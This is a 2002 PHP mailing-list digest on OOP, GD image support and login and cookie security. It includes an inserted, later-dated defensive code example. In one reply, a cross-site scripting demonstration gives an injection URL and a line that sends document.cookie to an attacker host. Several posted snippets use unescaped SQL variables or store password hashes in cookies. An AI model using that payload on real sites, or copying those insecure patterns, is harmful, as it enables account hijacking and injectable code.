php-general-digest-help_at_lists.php.net
Date: Wed Jul 17 2002 - 04:42:49 CDT


    php-general Digest 17 Jul 2002 09:42:49 -0000 Issue 1469

    Topics (messages 107973 through 108045):

    Re: Classes vs. Functions
            107973 by: Alberto Serra
            107984 by: Martin Towell
            108013 by: Michael Hall
            108021 by: Peter J. Schoenster
            108022 by: Martin Towell

    GIF Manipulation
            107974 by: Nick Oostveen
            107980 by: Jason Reid
            107983 by: Danny Shepherd

    pros and cons of ezpublish
            107975 by: Peter J. Schoenster

    contents from a database
            107976 by: Dan
            107988 by: Ralph

    Re: Editing files by line
            107977 by: Onaje Johnston
            107987 by: Analysis & Solutions

    Re: Newbie Question on Efficiency
            107978 by: Monty

    Re: Sessions / logins / cookies / security
            107979 by: Chris Shiflett
            107992 by: Justin French
            108001 by: John Holmes
            108002 by: Analysis & Solutions
            108004 by: Justin French
            108005 by: Justin French
            108007 by: John Holmes
            108011 by: Justin French
            108012 by: John Holmes
            108016 by: Justin French
            108018 by: John Holmes
            108019 by: Justin French
            108032 by: César Aracena
            108044 by: John Holmes

    Re: Newbie Question on Efficiency : Follow-up Question
            107981 by: Michael Kennedy
            107998 by: John Holmes
            108000 by: Analysis & Solutions
            108023 by: Michael Kennedy
            108024 by: Martin Towell
            108027 by: Michael Kennedy

    calling a cgi script from php
            107982 by: rdkurth.starband.net
            107999 by: John Holmes
            108009 by: Jason Wong

    transparent clusters + sessions
            107985 by: Chris Knipe
            108020 by: Tom Rogers
            108026 by: Chris Knipe

    mcrypt
            107986 by: Peter
            107991 by: Danny Shepherd

    Re: Fopen errors out when opening a URL
            107989 by: Analysis & Solutions

    Re: I can't echo object variables
            107990 by: Analysis & Solutions

    Re: Using index.php instead of index.html
            107993 by: Mark Gallagher
            107996 by: Chris Kay
            108003 by: Chris Knipe
            108010 by: Michael Hall
            108017 by: Jason Wong

    Re: Preventing Multiple Log-Ins after Authentication
            107994 by: Analysis & Solutions
            108037 by: Lars Olsson

    Printer margins
            107995 by: Manuel
            107997 by: Martin Towell

    problem with IMAP support
            108006 by: Jeff Schwartz
            108015 by: Jason Wong

    Re: activating php scripts via cron
            108008 by: Michael Hall
            108014 by: Jason Wong

    Break message in code.
            108025 by: W. Andy Roche
            108028 by: Jason Reid
            108029 by: Analysis & Solutions

    Bug in PHP?
            108030 by: Aleks D.
            108031 by: Martin Towell

    Strong Web Hosts in Canada?
            108033 by: Analysis & Solutions

    Re: PHP and Jigsaw
            108034 by: Murray Nicholas

    Re: Opening and Editing Quark Binaries
            108035 by: Miguel Cruz
            108040 by: Justin French
            108041 by: Justin French

    Require some help about the date comparison
            108036 by: Manisha
            108038 by: Jason Wong
            108039 by: Andrey Hristov
            108043 by: John Holmes

    Problem on file_exists() function
            108042 by: Jack

    Re: IF inside LOOP?
            108045 by: Ford, Mike [LSS]

    Administrivia:

    To subscribe to the digest, e-mail:
            php-general-digest-subscribelists.php.net

    To unsubscribe from the digest, e-mail:
            php-general-digest-unsubscribelists.php.net

    To post to the list, e-mail:
            php-generallists.php.net

    ----------------------------------------------------------------------

    attached mail follows:


    Hi!

    Martin Clifford wrote:
    > Could someone please explain the difference between classes and functions
    > and how to use a class.

    Well, that's a 1 billion $$ question. I don't think one can fully grasp
    that difference by reading an email. I strongly suggest you to buy
    yourself a book about OOP and have a go at it. That is, if you really
    care about knowing.

    Whether you should like OOP or not is a religious matter, so I will not
    enter the field. OOP has its pluses and its minuses. It's a technique,
    not an ultimate truth, although it is often presented as such. And as
    any technique, it can do wonders and it can do plain bull**t when not
    properly used.

    Nowadays 100% of my work is OOP based, but I worked some 15 years on
    functions and I cannot blame those who keep working that way. There are
    reasons for doing it and reason for not to do it. Get yourself a good
    clear book, then make a decision.

    Bye
    Alberto
    Kiev

    -_=}{=_--_=}{=_--_=}{=_--_=}{=_--_=}{=_--_=}{=_--_=}{=_-

    LoRd, CaN yOu HeAr Me, LiKe I'm HeArInG yOu?
    lOrD i'M sHiNiNg...
    YoU kNoW I AlMoSt LoSt My MiNd, BuT nOw I'm HoMe AnD fReE
    tHe TeSt, YeS iT iS
    ThE tEsT, yEs It Is
    tHe TeSt, YeS iT iS
    ThE tEsT, yEs It Is.......

    attached mail follows:


    >
    > Martin Clifford wrote:
    > > Could someone please explain the difference between classes and functions
    > > and how to use a class.
    >
    > Whether you should like OOP or not is a religious matter, so I will not
    > enter the field. OOP has its pluses and its minuses. It's a technique,
    > not an ultimate truth, although it is often presented as such. And as
    > any technique, it can do wonders and it can do plain bull**t when not
    > properly used.
    >
    > Nowadays 100% of my work is OOP based, but I worked some 15 years on
    > functions and I cannot blame those who keep working that way. There are
    > reasons for doing it and reason for not to do it. Get yourself a good
    > clear book, then make a decision.

    [snip]

    I have to agree here. IMO, there are benefits in using classes over
    functions, and there's benefits in using functions over classes. Once you
    get to know oop a little better, you should be able to determine which is
    better in any given situation.

    attached mail follows:


    There is no simple answer here. I have started using classes where I find
    I am writing a lot of related functions that share similar
    parameters. Database connection and queries are a good
    example. Authentication is another.

    I have another class that builds forms, because I just hate the tedium of
    coding HTML forms by hand. It is really just a collection of functions,
    though, and could work fine as such.

    I'm still learning/exploring ... I am always guided by the principle that
    whatever makes less work for me (but achieves the same result) is probably
    a good thing.

    IMHO classes are best for more universal code that really can be used in
    many different places. My functions tend to be more application specific.

    My 2 cents

    Michael

    On Tue, 16 Jul 2002, Chris Crane wrote:

    > Could someone please explain the difference between classes and functions
    > and how to use a class. I write a lot of PHP, but I never understood this at
    > all. I use an include statement in many of my pages and include a file with
    > a bunch of functions. For instance, I might have a function called stock();
    > In the page I am using I include the file that has this function and I call
    > it like this:
    >
    > stock($Sym);
    >
    > I am wondering if I am doing it the wrong way. So I need to better
    > understand classes. What is one, and why would you use it?
    >
    > Thanks.
    >
    >
    >
    >

    -- 
    --------------------------------
    n   i   n   t   i  .   c   o   m
    php-python-perl-mysql-postgresql
    --------------------------------
    Michael Hall     nintininti.com
    --------------------------------
    

    attached mail follows:


    On 17 Jul 2002 at 12:43, Michael Hall wrote:

    > There is no simple answer here. I have started using classes where I
    > find I am writing a lot of related functions that share similar
    > parameters. Database connection and queries are a good example.
    > Authentication is another.

    Yeah.

    > I have another class that builds forms, because I just hate the tedium
    > of coding HTML forms by hand. It is really just a collection of
    > functions, though, and could work fine as such.

    This is a gray area imho. I'd leave all html to the person who cares what it looks like, not what it does. I usually also use a code generator to create html and their forms but they are a separate layer. I use templates, wish a lot more php people would as well although I've seen some weird stuff where in this one bb they store templates in the database. That's interesting.

    > I'm still learning/exploring ... I am always guided by the principle
    > that whatever makes less work for me (but achieves the same result) is
    > probably a good thing.
    >
    > IMHO classes are best for more universal code that really can be used
    > in many different places. My functions tend to be more application
    > specific.

    Yeah, can't say too much more than that. There is the style of coding where one application is completely independent of another. Then you begin to realize, gee ... I could just cut and paste this code. And then there's always the funny repetition of the exact same code every 30 lines or so (depending on memory of programmer I guess). Eventually you begin to realize gee ... could I put this stuff in a library. A CLASS after all is just a collection of functions with a data model. But ... there is modular and then there is OO imho. I'm a die hard modular programmer who is trying to think in a more OO way. But of course when you just gotta get something done, do it. The value in spending a bit more time going the modular/OO route is that your application will be easier to evolve and debug.

    Peter
    --
    http://www.readbrazil.com/
    Answering Your Questions About Brazil

    attached mail follows:


    [snip]
    > A CLASS after all is just a collection of functions with a
    > data model. But ... there is modular and then there is OO imho.
    [snip]

    A class is more than just a bunch of functions that have been placed together. If you want to do that, then you might as well just throw them all into the same include file and that's it. There's no added benefit in wrapping a class around them.

    Agreed, a class can be used to simulate the C-style struct, or to collect a bunch of functions, but the real power of classes is when you start to model the "real world" objects (ie, methods and properties, not just functions and variables.)

    I'm not saying to go all OO (or all procedural, I use both...), just that when used correctly, they can be really helpful.

    attached mail follows:


    I'm currently developing a site which needs the ability to do server-side image cropping and resizing. I currently have a current version of GD installed with PHP, however the lack of support for GIFs is causing endless headaches.

    Is there any way to support GIFs in PHP without reverting to an older version of GD (and losing PNG support in the process)?

    Nick Oostveen

    attached mail follows:


    AFAIK there is a patch to re-add gif support to gd 1.8.4 (not sure about 2.x). I saw the url for it the other day on a newsgroup, I'll see if i can dig it up and post it.

    Jason Reid jasonachost.ca

    ----- Original Message -----
    From: "Nick Oostveen" <nicko-mlhpmarketing.com>
    To: <php-generallists.php.net>
    Sent: Tuesday, July 16, 2002 3:58 PM
    Subject: [PHP] GIF Manipulation

    > I'm currently developing a site which needs the ability to do server-side
    > image cropping and resizing. I currently have a current version of GD
    > installed with PHP, however the lack of support for GIFs is causing endless
    > headaches.
    >
    > Is there any way to support GIFs in PHP without reverting to an older
    > version of GD (and losing PNG support in the process)?
    >
    > Nick Oostveen
    >
    >
    > --
    > PHP General Mailing List (http://www.php.net/)
    > To unsubscribe, visit: http://www.php.net/unsub.php
    >

    attached mail follows:


    GD2 does have a compile time option which will re-enable support for writing GIFs. AFAIK you're only legally allowed to enable it if you live outside of the US/Canada.

    HTH

    Danny.

    ----- Original Message -----
    From: "Jason Reid" <jasonexumweb.net>
    To: <php-generallists.php.net>; "Nick Oostveen" <nicko-mlhpmarketing.com>
    Sent: Wednesday, July 17, 2002 12:04 AM
    Subject: Re: [PHP] GIF Manipulation

    > AFAIK there is a patch to re-add gif support to gd 1.8.4 (not sure about
    > 2.x). I saw the url for it the other day on a newsgroup, I'll see if i can
    > dig it up and post it.
    >
    > Jason Reid
    > jasonachost.ca
    >
    > ----- Original Message -----
    > From: "Nick Oostveen" <nicko-mlhpmarketing.com>
    > To: <php-generallists.php.net>
    > Sent: Tuesday, July 16, 2002 3:58 PM
    > Subject: [PHP] GIF Manipulation
    >
    >
    > > I'm currently developing a site which needs the ability to do server-side
    > > image cropping and resizing. I currently have a current version of GD
    > > installed with PHP, however the lack of support for GIFs is causing endless
    > > headaches.
    > >
    > > Is there any way to support GIFs in PHP without reverting to an older
    > > version of GD (and losing PNG support in the process)?
    > >
    > > Nick Oostveen
    > >
    > >
    > > --
    > > PHP General Mailing List (http://www.php.net/)
    > > To unsubscribe, visit: http://www.php.net/unsub.php
    > >
    > >
    >
    > --
    > PHP General Mailing List (http://www.php.net/)
    > To unsubscribe, visit: http://www.php.net/unsub.php
    >

    attached mail follows:


    Hi,

    Someone wants to know what I can do with ezpublish and so I've downloaded it.

    Wow ... just looking at it now. What a package. ezpublish.

    I'd like to test this on a virtural server (can't afford my own box on the net) and I have a host where I can modify my apache conf files ... but I wonder. I've even got access to imagemagick but I have to call it direct.

    Anyone with some experience or advice on ezpublish? It's about 14 meg uncompressed. Bloatware or is it worth the effort?

    Thanks,

    Peter

    attached mail follows:


    I have a script that can display all the contents from a database but I need the result to equal a variable, but when I do this it only displays one line from the database. I used to know this but I lost the info that I was given.

    this is the script I am using..

    $query = "SELECT * FROM content WHERE section='$section' ";
    $result = mysql_query($query);

    while($res = mysql_fetch_array($result)) {
        $sub="<a href='index2.html?section=".$res['section']."&code=".$res['code']."'>".$res['art_name']."</a><br> ";
    }

    I know there is something I can add after $sub. Please can you tell me what it is? thanks heaps, Dan

    attached mail follows:


    You need to use the concatenating assignment operator .= after $sub. The way you had it the variable $sub was getting assigned a new value each time through the while loop. The .= operator will add to the existing value of $sub each time through the loop.

    Try this:

    $query = "SELECT * FROM content WHERE section='$section' ";
    $result = mysql_query($query);

    $sub = ''; // start empty so .= has a value to append to
    while ($row = mysql_fetch_array($result)) {
        $sub .= "<a href='index2.html?section=" . $row['section'] . "&code=" . $row['code'] . "'>" . $row['art_name'] . "</a><br>\n";
    }

    Good luck :-)

    attached mail follows:


    -----Original Message-----
    From: Analysis & Solutions
    Sent: Tuesday, July 16, 2002 4:40 PM
    To: PHP List
    Subject: Re: [PHP] Re: Editing files by line

    On Tue, Jul 16, 2002 at 04:25:25PM -0400, Onaje Johnston wrote:
    >>
    >> if ($insert && $linenumber) {

    >But, if $linenumber is 0, this process won't happen. And, that was the
    >complaint you mentioned up front.
    >
    >So, you should do an "isset($linenumber)" instead.

    >--Dan

    Thanks.

    It works using "if ($insert && isset($linenumber)) {".

    So because the value of linenumber is 0 on the first line, the if statement was evaluating to false and therefore the update wouldn't occur, correct?

    attached mail follows:


    On Tue, Jul 16, 2002 at 06:38:04PM -0400, Onaje Johnston wrote:
    >
    > It works using "if ($insert && isset($linenumber)) {".
    >
    > So because the value of linenumber is 0 on the first line, the if statement
    > was evaluating to false and therefore the update wouldn't occur, correct?

    Exactly. If statements need something that's not '' or 0 in order to evaluate as positive.

    --Dan

    -- 
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    If you have a large number of functions, it might be better to separate them into a few files that you can include as needed. I use one file that contains functions needed by every page. I have a few other files that contain functions that aren't needed by every page, so, I include them only on pages that need them. But most functions go in the main include file used on every page.

    Separating them will also minimize some overhead if you have a lot of functions. Otherwise, if your include files aren't War & Peace in length, one include file is fine.

    >>>> mek2600realitycodec.net 07/16/02 04:59PM >>>
    > Hello everyone, I'm a newbie and have a question on style that I've not
    > seen addressed anywhere. I have a large number of frequently used
    > functions that I'm trying to find a good way to organize. The method
    > I'm thinking of using is to simply create a .php file called, for
    > example, functions.php. Then, just include the file at the top of each
    > page that needs any of the functions, and just call them as needed. My
    > question is this- if that file gets very large with tons of different
    > functions, is that an inefficient method? I'm not entirely clear on how
    > PHP is parsed and passed to the client. I assume it would be best to
    > divide up the functions into multiple files (ex. dbfunctions.php, etc.),
    > but is that still the best method? Basically, I'm just curious on how
    > you guys handle things like this.
    >
    > Thanks in advance.
    > Michael Kennedy
    >

    attached mail follows:


    Chad Day wrote:

    >What I'm looking to do is when a user logs in, I start up the session.. I
    >then have the registered session var to verify they are authenticated as
    >they move throughout the site.
    >
    >Now, when they close the browser and come back, I want them to still be
    >authenticated. Obviously, I have to set a cookie. But what do I set? Do I
    >set just their user ID? The MD5 of their password? What's the most secure
    >way, that's not easily spoofed? I don't know that much about cookies, but
    >if I just use a user ID, couldn't someone just change that ID value and
    >'become' another user?
    >

    Chad,

    It sounds like you already have a good idea about the insecurity of the method you mentioned. For the most part, trust your instincts, especially when something seems insecure. :-) You just need to try to come up with a method that is difficult to break. Use your creativity, and for each method you can think of, consider what steps must be taken to break the security of that method. There is always a way, but "changing the user ID" isn't very difficult to achieve.

    The cookie is a good idea, but the value of the cookie is what you need to think about. If its value is, as you mentioned, a user ID, someone could try to guess another valid user ID to impersonate another user. Remember that the cookie is data coming from the client that should not be trusted at all. Take the same precautions against client data as you would candy from a stranger; it doesn't mean it's necessarily bad candy, but you need to create some methods to give yourself pretty good assurance that it's not poisoned, etc. You want to inspect it.

    In your case, you want to create some methods of assuring, to a reasonable extent, that the cookie is coming from the same client as before. With each connection, there are several things you can check, and you can decide whether it's more appropriate to store the data you want to check on the client or on the server.

    For example, if you were to store the IP address in the cookie also, then someone would have to be coming from the same IP address as before (it would seem). Of course, an observant attacker would change the value of this cookie to their own IP to see if that helped them bypass this check, which it would. What if, instead, you stored the IP address on the server in a database associated with the unique ID? Then you can at least be fairly assured that this value cannot be changed. Another option for you might be to encrypt the IP address and keep it in the cookie. This way, if someone else tried to use the same cookie, their IP address would have to appear to be the same (which of course would happen if it's the same computer).

    Other information you can get from the client includes the browser type, date, etc. The more things you check, and the more difficult you make it for the client to change this data (otherwise your checks aren't very useful), the more difficult you make impersonation. Just make sure to also cater to your legitimate users, which hopefully there will be more of. :-) If your users connect through a large LAN with multiple proxies, their IP address may fluctuate. Dialup users may have fluctuating IPs as well. If you require someone who fails your checks to only provide their password to continue, then the hassle you give your legitimate users is very minimal, and they might appreciate knowing you're looking out for the safety of their data.

    These are just some ideas. You're ultimately the best person to decide what security model is best for your needs. Like I said, try to be creative and trust your instincts. A good procedure might be to design what you think is a sufficiently strong and useful security model for your needs and ask the list to come up with hypothetical methods that could be used to break it. If the attacks seem very easy to accomplish, you might need to rethink your methods.

    Anyway, my point is that you want to educate yourself enough that *you* design the security of your site. Trusting others for your security is no better than trusting candy from strangers. :-)

    Happy hacking.

    Chris

    attached mail follows:


    On my sites, I have a check box next to the login form which says "remember me". If they tick this box, and their userid/password is valid, I set a cookie on their system which remembers them, which is just their username and an md5() of their password (the same data I add to the session).

    When maintaining the session, I first check if there is a $_SESSION['uid'] and $_SESSION['pwd'] -- if there is, I validate them (check against the db).

    If not, I then look for them in my cookie... if they exist, I validate them (check against the db), and assign them to the session.

    So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE. If there's nothing there, they aren't logged in as far as I can tell. On every page I validate the uid and pwd against the database, so the only way you could fake being another user is to know the uid AND md5()'d pwd.

    Justin French

    on 17/07/02 2:30 AM, Chad Day (cdayatpco.com) wrote:

    > I asked something similar a little while ago, but didn't do a good job
    > clarifying.
    >
    > What I'm looking to do is when a user logs in, I start up the session.. I
    > then have the registered session var to verify they are authenticated as
    > they move throughout the site.
    >
    > Now, when they close the browser and come back, I want them to still be
    > authenticated. Obviously, I have to set a cookie. But what do I set? Do I
    > set just their user ID? The MD5 of their password? What's the most secure
    > way, that's not easily spoofed? I don't know that much about cookies, but
    > if I just use a user ID, couldn't someone just change that ID value and
    > 'become' another user?
    >
    > Thanks for any advice,
    > Chad
    >

    attached mail follows:


    > So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE. If
    > there's nothing there, they aren't logged in as far as I can tell. On every
    > page I validate the uid and pwd against the database, so the only way you
    > could fake being another user is to know the uid AND md5()'d pwd.

    Or steal it. :)

    I hope you have checked your site for any cross-site scripting vulnerabilities. This is exactly where vulnerabilities like this come into play...

    ---John Holmes...

    attached mail follows:


    On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote:
    > I set a
    > cookie on their system which remembers them, which is just their username
    > and an md5() of their password (the same data I add to the session).

    OUCH! Sending the password back out to the net is a scary prospect.

    --Dan

    -- 
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    on 17/07/02 11:11 AM, Analysis & Solutions (danielcanalysisandsolutions.com) wrote:

    > On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote:
    >> I set a
    >> cookie on their system which remembers them, which is just their username
    >> and an md5() of their password (the same data I add to the session).
    >
    > OUCH! Sending the password back out to the net is a scary prospect.

    Interesting -- I haven't actually implemented this on a live site, but was about to in the next few days... might hold off :)

    How else can you verify the user in a "remember me" situation?

    Justin

    attached mail follows:


    on 17/07/02 11:11 AM, John Holmes (holmes072000charter.net) wrote:

    > Or steal it. :)
    >
    > I hope you have checked your site for any cross-site scripting
    > vulnerabilities. This is exactly where vulnerabilities like this come
    > into play...

    Interesting -- I'm only a few days away from launching this... could you elaborate on the potential risk, or point me to some documentation?

    Thanks heaps,

    Justin French

    attached mail follows:


    > > Or steal it. :)
    > >
    > > I hope you have checked your site for any cross-site scripting
    > > vulnerabilities. This is exactly where vulnerabilities like this come
    > > into play...
    >
    > Interesting -- I'm only a few days away from launching this... could you
    > elaborate on the potential risk, or point me to some documentation?

    Just search google for Cross Site Scripting and you'll find a ton of articles about that specifically. It all comes down to validating user input and not displaying it directly back to the screen.

    Here is a link, for example, that'll pop up your cookies for cnn.com. (watch the wrapping!)

    http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf =1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3 B%3C%2Fscript%3E

    Now, how about instead of just executing alert("Hi"), I do a location.href='www.myserver.com?var='+document.cookie; and send myself your cookie. Then I just simply make my cookie match yours, and poof, I'm you. :)

    It all comes down to validating user input and never showing it directly back to the browser/screen.

    Similar problems exist for variables you use in database queries...

    ---John Holmes...

    attached mail follows:


    Thanks heaps John,

    So as a basic rule, having a uid and pwd stored as session variables is NOT the problem, but storing the uid and/or pwd in a cookie on the browser is just plain asking for it :)

    So, how do you implement a "remember me" safely?

    Setting JUST the uid in a cookie prevents people from knowing the pwd, but I have to validate the user before granting access to pages... without a pwd, it seems, errrr, impossible :)

    Justin

    > Just search google for Cross Site Scripting and you'll find a ton of
    > articles about that specifically. It all comes down to validating user
    > input and not displaying it directly back to the screen.
    >
    > Here is a link, for example, that'll pop up your cookies for cnn.com.
    > (watch the wrapping!)
    >
    > http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf
    > =1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3
    > B%3C%2Fscript%3E
    >
    > Now, how about instead of just executing alert("Hi"), I do a
    > location.href='www.myserver.com?var='+document.cookie; and send myself
    > your cookie. Then I just simply make my cookie match yours, and poof,
    > I'm you. :)
    >
    > It all comes down to validating user input and never showing it directly
    > back to the browser/screen.
    >
    > Similar problems exist for variables you use in database queries...
    >
    > ---John Holmes...
    >

    attached mail follows:


    > So as a basic rule, having a uid and pwd stored as session variables is NOT
    > the problem, but storing the uid and/or pwd in a cookie on the browser is
    > just plain asking for it :)

    You shouldn't even have to do this. Just set a $_SESSION['logged_on'] variable to true and check for that. Why carry around the username and password??

    > So, how do you implement a "remember me" safely?

    You don't, if you have anything to protect. If it's just for a forum or convenience and might just cause a little headache if someone's user is hijacked, then you can do it with a cookie.

    > Setting JUST the uid in a cookie prevents people from knowing the pwd, but I
    > have to validate the user before granting access to pages... without a pwd,
    > it seems, errrr, impossible :)

    Why do people insist on it being something related to the username and password. Just use uniqid() and md5() to create a unique id for the user, save it in their table, and use that in the cookie. If you base it off of something, it makes it easier to crack...

    ---John Holmes...
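
Added example, not part of any message in this digest: one way to build the "remember me" cookie the thread arrives at, a random identifier saved in the user's table instead of anything derived from the username or password. It swaps uniqid()/md5() for PHP's random_bytes() CSPRNG, stores only a SHA-256 hash of the token and rotates it on every use; the RememberMeStore class, the in-memory array standing in for the table, the cookie name "remember" and user id 42 are assumptions for illustration (PHP 7.4 or later).

```php
<?php
declare(strict_types=1);

// Added illustration; RememberMeStore and the array "table" are hypothetical.
final class RememberMeStore
{
    /** selector => ['uid' => int, 'hash' => string, 'expires' => int] */
    private array $rows = [];

    /** Create a token for $uid and return the cookie value "selector:validator". */
    public function issue(int $uid, int $ttl = 1209600): string
    {
        $selector  = bin2hex(random_bytes(9));   // row lookup key
        $validator = bin2hex(random_bytes(32));  // the secret, unrelated to uid or password
        $this->rows[$selector] = [
            'uid'     => $uid,
            'hash'    => hash('sha256', $validator), // a copied table yields no usable cookies
            'expires' => time() + $ttl,
        ];
        return $selector . ':' . $validator;
    }

    /**
     * Validate a cookie value. Returns ['uid' => int, 'cookie' => string] with a
     * freshly rotated cookie value, or null if the value is unknown, expired or wrong.
     */
    public function redeem(string $cookie): ?array
    {
        $parts = explode(':', $cookie, 2);
        if (count($parts) !== 2) {
            return null;
        }
        [$selector, $validator] = $parts;
        $row = $this->rows[$selector] ?? null;
        if ($row === null) {
            return null;
        }
        unset($this->rows[$selector]);           // single use, whether or not it matches
        if ($row['expires'] < time()) {
            return null;
        }
        if (!hash_equals($row['hash'], hash('sha256', $validator))) {
            return null;
        }
        return ['uid' => $row['uid'], 'cookie' => $this->issue($row['uid'])];
    }

    /** Drop every token for a user, e.g. on logout or password change. */
    public function revokeAll(int $uid): void
    {
        $this->rows = array_filter($this->rows, fn(array $r): bool => $r['uid'] !== $uid);
    }
}

/** Send the cookie so page script cannot read it and it only travels over HTTPS. */
function sendRememberCookie(string $value, int $ttl = 1209600): void
{
    setcookie('remember', $value, [
        'expires'  => time() + $ttl,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

/** Log in from the cookie; returns the uid, or null to fall back to the password form. */
function loginFromCookie(RememberMeStore $store, array $cookies, array &$session): ?int
{
    $result = isset($cookies['remember']) ? $store->redeem((string) $cookies['remember']) : null;
    if ($result === null) {
        return null;
    }
    $session['logged_on']  = true;               // the flag suggested in the thread
    $session['uid']        = $result['uid'];
    $session['via_cookie'] = true;               // ask for the password before sensitive actions
    if (PHP_SAPI !== 'cli') {
        sendRememberCookie($result['cookie']);   // hand the rotated value back to the browser
    }
    return $result['uid'];
}

// Constructed demo, runs offline under the CLI.
if (PHP_SAPI === 'cli') {
    $store   = new RememberMeStore();
    $session = [];
    $cookie  = $store->issue(42);                                         // user ticks "remember me"
    var_dump(loginFromCookie($store, ['remember' => $cookie], $session)); // first return visit
    var_dump(loginFromCookie($store, ['remember' => $cookie], $session)); // same value replayed
    var_dump($store->redeem('42:' . md5('secret')));                      // uid + md5(password) style guess
}
```

The httponly flag keeps the value out of document.cookie, which is what the cross-site scripting link earlier in the thread reads; output encoding is still needed to close the script injection itself.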

    attached mail follows:


    on 17/07/02 12:35 PM, John Holmes (holmes072000charter.net) wrote:

    > You shouldn't even have to do this. Just set a $_SESSION['logged_on']
    > variable to true and check for that. Why carry around the username and
    > password??

    Well, I guess it's because I started with someone else's script, and built my own from there. Not being a security expert, I assumed that they did this for a reason.

    Are you saying that setting $_SESSION['logged_on'] after I've validated their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ?

    Interesting stuff...

    So the real problem with sessions is hijacking the session ID, not fake $_SESSION vars.

    I guess I need to look into session hijacking next.

    >> So, how do you implement a "remember me" safely?
    >
    > You don't, if you have anything to protect. If it's just for a forum or
    > convenience and might just cause a little headache if someone's user is
    > hijacked, then you can do it with a cookie.

    What about if the cookie was set under https / SSL

    > Why do people insist on it being something related to the username and > password. Just use uniqid() and md5() to create a unique id for the use, > save it in their table, and use that in the cookie. If you base it off > of something, it makes it easier to crack...

    Good point.

    Thanks for your advice.

    Justin French

    attached mail follows:


    > > You shouldn't even have to do this. Just set a $_SESSION['logged_on']
    > > variable to true and check for that. Why carry around the username and
    > > password??
    >
    > Well, I guess it's because I started with someone else's script, and built
    > my own from there. Not being a security expert, I assumed that they did
    > this for a reason.
    >
    > Are you saying that setting $_SESSION['logged_on'] after I've validated
    > their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ?

    Sure, why not? Users can't create session variables (unless you're on a virtual server...)

    > Interesting stuff...
    >
    > So the real problem with sessions is hijacking the session ID, not fake
    > $_SESSION vars.

    Correct. The good thing with sessions is that they only last for as long as the browser is open. So you can't come back and hijack a user. You'd have to do it at the same time that the user is online.

    > I guess I need to look into session hijacking next.
    >
    > >> So, how do you implement a "remember me" safely?
    > >
    > > You don't, if you have anything to protect. If it's just for a forum or
    > > convenience and might just cause a little headache if someone's user is
    > > hijacked, then you can do it with a cookie.
    >
    > What about if the cookie was set under https / SSL

    It makes it secure from sniffing... I don't think it would help for a cross site scripting vulnerability, though...

    ---John Holmes...

    attached mail follows:


    on 17/07/02 1:05 PM, John Holmes (holmes072000charter.net) wrote:

    > Sure, why not? Users can't create session variables (unless you're on a
    > virtual server...)

    ... and I am -- A shared host server that is.

    Justin French

    attached mail follows:


    I came across the same problem a few weeks ago, and thought (didn't do it though) that the best way to handle this kind of security, would be to make an ID/cookie for the user/session which deletes itself after the browser is closed, but not storing the password.

    Then, if that same user wants to open a new session on another computer at the same time, I would have a *REPLICATION* script which looks up that user and tells him that he already has an open session and that he should type the password again (like Hotmail does). Makes sense?

    C.

    > -----Original Message-----
    > From: 1LT John W. Holmes [mailto:holmes072000charter.net]
    > Sent: Tuesday, July 16, 2002 4:51 PM
    > To: Chad Day; php-generallists.php.net
    > Subject: Re: [PHP] Sessions / logins / cookies / security
    >
    > There really isn't a good way to do this, I think.
    >
    > Any time you're taking just a cookie, and using that data to assume who the
    > user is, it's open to hijacking. I can sniff the cookie or maybe find a
    > cross-site scripting bug to steal it, create the same cookie on my machine,
    > and poof, I'm that user.
    >
    > Now, if it's just for a forum, or something simple, then just do it. It's
    > not worth worrying about someone hijacking my forum user.
    >
    > Anyway, the best way to create the unique id is to use uniqid() in combo
    > with md5(). That'll give you a 32 character string that's hard to predict
    > and isn't based on any of the user data.
    >
    > www.php.net/uniqid
    >
    > ---John Holmes...
    >
    > ----- Original Message -----
    > From: "Chad Day" <cdayatpco.com>
    > To: <php-generallists.php.net>
    > Sent: Tuesday, July 16, 2002 3:30 PM
    > Subject: RE: [PHP] Sessions / logins / cookies / security
    >
    > > Anyone? Can someone at least point me to some web article for
    > > recommendations? I saw some examples where a password variable was stored,
    > > but is that really safe (as long as I MD5 it first?)
    > >
    > > Chad
    > >
    > > -----Original Message-----
    > > From: Chad Day [mailto:cdayatpco.com]
    > > Sent: Tuesday, July 16, 2002 12:30 PM
    > > To: php-generallists.php.net
    > > Subject: [PHP] Sessions / logins / cookies / security
    > >
    > > I asked something similar a little while ago, but didn't do a good job
    > > clarifying.
    > >
    > > What I'm looking to do is when a user logs in, I start up the session.. I
    > > then have the registered session var to verify they are authenticated as
    > > they move throughout the site.
    > >
    > > Now, when they close the browser and come back, I want them to still be
    > > authenticated. Obviously, I have to set a cookie. But what do I set? Do I
    > > set just their user ID? The MD5 of their password? What's the most secure
    > > way, that's not easily spoofed? I don't know that much about cookies, but
    > > if I just use a user ID, couldn't someone just change that ID value and
    > > 'become' another user?
    > >
    > > Thanks for any advice,
    > > Chad

    attached mail follows:


    > > Sure, why not? Users can't create session variables (unless you're on a
    > > virtual server...)
    >
    > ... and I am -- A shared host server that is.

    Now I'm not sure on this, I haven't tested it. Has anyone?

